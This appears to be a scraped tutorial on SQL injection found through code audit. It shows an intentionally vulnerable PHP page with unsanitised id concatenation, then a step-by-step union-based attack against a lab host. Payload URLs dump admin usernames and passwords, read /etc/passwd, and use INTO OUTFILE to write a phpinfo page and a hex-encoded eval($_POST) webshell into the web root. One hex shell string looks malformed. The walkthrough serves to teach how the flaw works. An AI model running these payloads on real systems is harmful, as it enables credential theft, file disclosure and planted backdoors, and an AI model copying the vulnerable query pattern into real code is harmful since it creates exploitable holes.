SQL injection of Code audits

Source: Internet
Author: User
Tags: sql injection

Overview: a rough classification

PS: simple error injection

0x00 Environment Kali LAMP

0x01 Core Code

The main cause of injection today is that programmers build SQL statements by the most primitive form of string concatenation. SQL has four kinds of statement, select, insert, update and delete, and injection arises from concatenating user input into each of these four basic operations. Below I take select as the example to walk beginners through SQL injection. Select is the database read operation, so it is common in places such as article views and searches. The defective code is as follows:

<?php
$conn = mysql_connect('localhost', 'root', 'root') or die('bad!');
mysql_query("SET NAMES binary");
mysql_select_db('test', $conn) or die("Database connection failed");
// here id is not cast to an integer
$id = isset($_GET['id']) ? $_GET['id'] : 1;
// the SQL statement has no single-quote protection either, so injection is possible
$sql = "SELECT * FROM news WHERE id={$id}";
$result = mysql_query($sql, $conn) or die(mysql_error());
?>

Database content (screenshot in the original post)


0x02 Injection Testing

1. Normal access

http://192.168.192.128/sqltest/news.php

http://192.168.192.128/sqltest/news.php?id=1

http://192.168.192.128/sqltest/news.php?id=2

...

2. Test the number of columns

PS: ORDER BY 3 returns normally and ORDER BY 4 errors, which shows there are three columns

http://192.168.192.128/sqltest/news.php?id=1 and 1=2 order by 3

http://192.168.192.128/sqltest/news.php?id=1 and 1=2 order by 4

3. Test which columns are echoed

PS: both 2 and 3 are echoed, so those are the echo columns

http://192.168.192.128/sqltest/news.php?id=-1 union select 1,2,3

For example, put the user() function in column 3 to test it

4. Query all tables in the current database

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

5. Test the column names in the table

PS: admin in hex is 0x61646d696e; news in hex is 0x6e657773

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e


6. Query the usernames and passwords in the admin table

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(name,0x23,pass) from admin

7. Read Linux system files (/etc/passwd; the path has to be converted to hex)

PS: requires sufficient privileges

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,load_file(0x2f6574632f706173737764)


8. Write a shell if you have sufficient privileges

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'--

If the privileges are insufficient, change the directory.

phpinfo page:

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,0x3c3f70687020706870696e666f28293b203f3e into outfile '/var/www/html/sqltest/3.php'--

Write a webshell (note that what is hex-encoded is the statement):

192.168.192.128/sqltest/news.php?id=-1 union select 1,2,0x3c3f706870206576616c28245f504f53545b615d293b3f3e into outfile '/var/www/html/sqltest/5.php'--

Execution completes without error


In addition, the files written through the injection may not be deletable even by root and have to be dealt with using chattr (this can come up in attack and defence competitions).



